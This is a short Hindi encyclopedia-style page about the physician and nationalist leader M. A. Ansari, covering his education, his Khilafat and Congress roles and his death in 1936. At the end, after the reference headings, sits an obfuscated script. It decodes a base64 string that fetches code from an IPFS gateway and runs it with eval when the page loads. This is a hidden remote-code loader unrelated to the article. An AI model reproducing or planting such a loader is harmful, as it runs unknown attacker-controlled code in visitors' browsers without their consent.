एम. ए. अंसारी
भारत डिस्कवरी प्रस्तुति
![]() |
इस लेख का पुनरीक्षण एवं सम्पादन होना आवश्यक है। आप इसमें सहायता कर सकते हैं। "सुझाव" |
- एम. ए. अंसारी प्रसिद्ध राष्ट्रवादी मुस्लिम नेता थे।
- एम. ए. अंसारी का जन्म इलाहाबाद में हुआ था।
- ढाका में शिक्षा प्राप्त करने के बाद वे 1901 में चिकित्सा की शिक्षा के लिए विदेश गए।
- एम. ए. अंसारी ने एडिनबरा विश्वविद्यालय में अपनी शिक्षा पूरी की और कई वर्ष तक लंदन के विभिन्न अस्पतालों में काम किया।
- 1912 में डॉ. अंसारी ने तुर्की में अखिल भारतीय चिकित्सा मिशन का आयोजन किया।
- सार्वजनिक जीवन और चिकित्सा दोनों क्षेत्रों में उनका बड़ा सम्मान था।
- 1920 में उन्होंने भारतीय मुस्लिम लीग की अध्यक्षता का पद स्वीकार किया।
- एम. ए. अंसारी ख़िलाफ़त आन्दोलन में भी सक्रिय रहे और 1922 में गया कि ख़िलाफ़त सम्मेलन की अध्यक्षता का पद संभाला। गांधी जी से उनका निकट का सम्पर्क था।
- 1927 में मद्रास के कांग्रेस अधिवेशन के एम. ए. अंसारी ही अध्यक्ष रहे।
- गांधी जी द्वारा संचालित 1930 और 1932 के आन्दोलनों में भाग लेने के कारण उन्होंने कई बार जेल यात्राएँ कीं।
- अंसारी अपने समय में दिल्ली के प्रतिष्ठित चिकित्सक थे।
- स्वास्थ्य ठीक न रहने के कारण निधन से एक वर्ष पूर्व उन्होंने सक्रिय राजनीति से संन्यास ले लिया था। 1936 ई. में उनका देहान्त हो गया।
- दिल्ली का अंसारी रोड उन्हीं की यादगार है।
|
|
|
|
|
टीका टिप्पणी और संदर्भ
बाहरी कड़ियाँ
संबंधित लेख
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>